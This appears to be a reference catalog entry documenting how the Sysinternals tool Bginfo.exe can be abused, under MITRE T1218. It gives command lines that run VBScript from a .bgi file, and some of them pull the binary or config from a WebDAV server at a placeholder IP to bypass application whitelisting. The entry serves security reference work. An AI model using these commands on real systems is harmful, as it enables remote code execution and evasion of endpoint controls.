.. / Bginfo.exe
Star

Background Information Utility included with SysInternals Suite


Paths:


Resources:
https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

Acknowledgement:
Oddvar Moe - @oddvarmoe


Detection:



Execute

Execute VBscript code that is referenced within the bginfo.bgi file.
bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase:Local execution of VBScript
Privileges required:User
OS:Windows
Mitre:T1218



Execute bginfo.exe from a WebDAV server.
\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase:Remote execution of VBScript
Privileges required:User
OS:Windows
Mitre:T1218



This style of execution may not longer work due to patch.
\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase:Remote execution of VBScript
Privileges required:User
OS:Windows
Mitre:T1218



AWL bypass

Execute VBscript code that is referenced within the bginfo.bgi file.
bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase:Local execution of VBScript
Privileges required:User
OS:Windows
Mitre:T1218



Execute bginfo.exe from a WebDAV server.
\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase:Remote execution of VBScript
Privileges required:User
OS:Windows
Mitre:T1218



This style of execution may not longer work due to patch.
\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase:Remote execution of VBScript
Privileges required:User
OS:Windows
Mitre:T1218